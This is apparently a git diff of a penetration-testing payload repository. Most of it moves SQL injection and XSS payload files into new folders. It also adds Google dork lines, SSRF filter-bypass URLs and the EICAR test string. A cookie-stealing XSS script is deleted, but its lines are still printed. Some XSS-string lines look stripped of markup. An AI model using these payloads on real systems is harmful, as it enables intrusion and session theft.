diff --git a/Methodology_and_enumeration.md b/Methodology_and_enumeration.md
index 471f459..cf53ee8 100644
--- a/Methodology_and_enumeration.md
+++ b/Methodology_and_enumeration.md
@@ -18,10 +18,11 @@ knockpy domain.com -w subdomains-top1mil-110000.txt
 * Using Google Dorks and Google Transparency Report
 ```bash
 site:*.domain.com -www
-site:http://domain.com filetype:pdf
-site:http://domain.com inurl:&
-site:http://domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
-site:http://domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
+site:domain.com filetype:pdf
+site:domain.com inurl:'&'
+site:domain.com inurl:login,register,upload,logout,redirect,redir,goto,admin
+site:domain.com ext:php,asp,aspx,jsp,jspa,txt,swf
+site:*.*.domain.com You need to include subdomains ;)
 https://www.google.com/transparencyreport/https/ct/?hl=en-US#domain=[DOMAIN]g&incl_exp=true&incl_sub=true
diff --git a/SQL injection/Payloads/FUZZDB_GenericBlind.txt b/SQL injection/Intruders/FUZZDB_GenericBlind.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_GenericBlind.txt
rename to SQL injection/Intruders/FUZZDB_GenericBlind.txt
diff --git a/SQL injection/Payloads/FUZZDB_MSSQL-WHERE_Blind.txt b/SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_MSSQL-WHERE_Blind.txt
rename to SQL injection/Intruders/FUZZDB_MSSQL-WHERE_Blind.txt
diff --git a/SQL injection/Payloads/FUZZDB_MSSQL.txt b/SQL injection/Intruders/FUZZDB_MSSQL.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_MSSQL.txt
rename to SQL injection/Intruders/FUZZDB_MSSQL.txt
diff --git a/SQL injection/Payloads/FUZZDB_MSSQL_Enumeration.txt b/SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_MSSQL_Enumeration.txt
rename to SQL injection/Intruders/FUZZDB_MSSQL_Enumeration.txt
diff --git a/SQL injection/Payloads/FUZZDB_MYSQL.txt b/SQL injection/Intruders/FUZZDB_MYSQL.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_MYSQL.txt
rename to SQL injection/Intruders/FUZZDB_MYSQL.txt
diff --git a/SQL injection/Payloads/FUZZDB_MySQL-WHERE_Blind.txt b/SQL injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_MySQL-WHERE_Blind.txt
rename to SQL injection/Intruders/FUZZDB_MySQL-WHERE_Blind.txt
diff --git a/SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt b/SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_MySQL_ReadLocalFiles.txt
rename to SQL injection/Intruders/FUZZDB_MySQL_ReadLocalFiles.txt
diff --git a/SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt b/SQL injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_MySQL_SQLi_LoginBypass.txt
rename to SQL injection/Intruders/FUZZDB_MySQL_SQLi_LoginBypass.txt
diff --git a/SQL injection/Payloads/FUZZDB_Oracle.txt b/SQL injection/Intruders/FUZZDB_Oracle.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_Oracle.txt
rename to SQL injection/Intruders/FUZZDB_Oracle.txt
diff --git a/SQL injection/Payloads/FUZZDB_Postgres_Enumeration.txt b/SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt
similarity index 100%
rename from SQL injection/Payloads/FUZZDB_Postgres_Enumeration.txt
rename to SQL injection/Intruders/FUZZDB_Postgres_Enumeration.txt
diff --git a/SQL injection/Payloads/Generic_SQLi b/SQL injection/Intruders/Generic_SQLi
similarity index 100%
rename from SQL injection/Payloads/Generic_SQLi
rename to SQL injection/Intruders/Generic_SQLi
diff --git a/SQL injection/Payloads/SQLi_Polyglots.txt b/SQL injection/Intruders/SQLi_Polyglots.txt
similarity index 100%
rename from SQL injection/Payloads/SQLi_Polyglots.txt
rename to SQL injection/Intruders/SQLi_Polyglots.txt
diff --git a/SSRF injection/README.md b/SSRF injection/README.md
index 53a6fec..fd99c41 100644
--- a/SSRF injection/README.md
+++ b/SSRF injection/README.md
@@ -28,7 +28,7 @@ Advanced exploit using type=url
 ```
 Change "type=file" to "type=url"
 Paste URL in text field and hit enter
-Using this vulnerability users can upload images from any image URL = trigger an SSRF
+Using this vulnerability users can upload images from any image URL = trigger an SSRF
 ```
 ## Bypassing
@@ -58,5 +58,20 @@ localhost:+11211aaa
 localhost:00011211aaaa
 ```
+Bypass using rare address
+```
+http://0/
+```
+
+Bypass using tricks combination
+```
+http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
+urllib2 : 1.1.1.1
+requests + browsers : 2.2.2.2
+urllib : 3.3.3.3
+```
+
 ## Thanks to
 * [Hackerone - How To: Server-Side Request Forgery (SSRF)](https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF)
+* [Awesome URL abuse for SSRF by @orange_8361 #BHUSA](https://twitter.com/albinowax/status/890725759861403648)
+* [How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai](http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html)
diff --git a/Upload insecure files/Eicar/eicar.com.txt b/Upload insecure files/Eicar/eicar.com.txt
new file mode 100644
index 0000000..a2463df
--- /dev/null
+++ b/Upload insecure files/Eicar/eicar.com.txt
@@ -0,0 +1 @@
+X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
\ No newline at end of file
diff --git a/XSS injection/Cookie Grabber XSS.php b/XSS injection/Cookie Grabber XSS.php
deleted file mode 100644
index 2058e44..0000000
--- a/XSS injection/Cookie Grabber XSS.php
+++ /dev/null
@@ -1,11 +0,0 @@
-document.location='http://localhost/XSS/grabber.php?c=' + document.cookie
-
-// Write the cookie in a file
-$cookie = $_GET['c'];
-$fp = fopen('cookies.txt', 'a+');
-fwrite($fp, 'Cookie:' .$cookie.'\r\n');
-fclose($fp);
-
-?>
\ No newline at end of file
diff --git "a/XSS injection/files/\">" "b/XSS injection/Files/\">"
similarity index 100%
rename from "XSS injection/files/\">"
rename to "XSS injection/Files/\">"
diff --git a/XSS injection/files/'> b/XSS injection/Files/'>
similarity index 100%
rename from XSS injection/files/'>
rename to XSS injection/Files/'>
diff --git a/XSS injection/files/InsecureFlashFile.swf b/XSS injection/Files/InsecureFlashFile.swf
similarity index 100%
rename from XSS injection/files/InsecureFlashFile.swf
rename to XSS injection/Files/InsecureFlashFile.swf
diff --git a/XSS injection/files/SVG_XSS.svg b/XSS injection/Files/SVG_XSS.svg
similarity index 100%
rename from XSS injection/files/SVG_XSS.svg
rename to XSS injection/Files/SVG_XSS.svg
diff --git a/XSS injection/files/SWF_XSS.swf b/XSS injection/Files/SWF_XSS.swf
similarity index 100%
rename from XSS injection/files/SWF_XSS.swf
rename to XSS injection/Files/SWF_XSS.swf
diff --git a/XSS injection/XML XSS basic.html b/XSS injection/Files/XML XSS.xml
similarity index 100%
rename from XSS injection/XML XSS basic.html
rename to XSS injection/Files/XML XSS.xml
diff --git a/XSS injection/files/XML_XSS.xml b/XSS injection/Files/XML_XSS_cheatsheet.html
similarity index 100%
rename from XSS injection/files/XML_XSS.xml
rename to XSS injection/Files/XML_XSS_cheatsheet.html
diff --git a/XSS injection/files/xss_comment_exif_metadata_double_quote.png b/XSS injection/Files/xss_comment_exif_metadata_double_quote.png
similarity index 100%
rename from XSS injection/files/xss_comment_exif_metadata_double_quote.png
rename to XSS injection/Files/xss_comment_exif_metadata_double_quote.png
diff --git a/XSS injection/files/xss_comment_exif_metadata_single_quote.png b/XSS injection/Files/xss_comment_exif_metadata_single_quote.png
similarity index 100%
rename from XSS injection/files/xss_comment_exif_metadata_single_quote.png
rename to XSS injection/Files/xss_comment_exif_metadata_single_quote.png
diff --git a/XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt b/XSS injection/Intruders/BRUTELOGIC-XSS-JS.txt
similarity index 100%
rename from XSS injection/BRUTELOGIC-XSS-BYPASS-STRINGS.txt
rename to XSS injection/Intruders/BRUTELOGIC-XSS-JS.txt
diff --git a/XSS injection/BRUTELOGIC-XSS-STRINGS.txt b/XSS injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt
similarity index 53%
rename from XSS injection/BRUTELOGIC-XSS-STRINGS.txt
rename to XSS injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt
index 5ea07a0..2d73886 100644
--- a/XSS injection/BRUTELOGIC-XSS-STRINGS.txt
+++ b/XSS injection/Intruders/BRUTELOGIC-XSS-STRINGS.txt
@@ -6,78 +6,78 @@
 '-alert(1)//
 \'-alert(1)//
-lose focus!
-click this!
-copy this!
-right click this!
-copy this!
-double click this!
-drag this!
-focus this!
-input here!
-press any key!
-press any key!
-press any key!
-click this!
-hover this!
-hover this!
-hover this!
-click this!
+lose focus!
+click this!
+copy this!
+right click this!
+copy this!
+double click this!
+drag this!
+focus this!
+input here!
+press any key!
+press any key!
+press any key!
+click this!
+hover this!
+hover this!
+hover this!
+click this!
 paste here!
-
+```
+
 ## XSS in HTML/Applications XSS Basic
 ```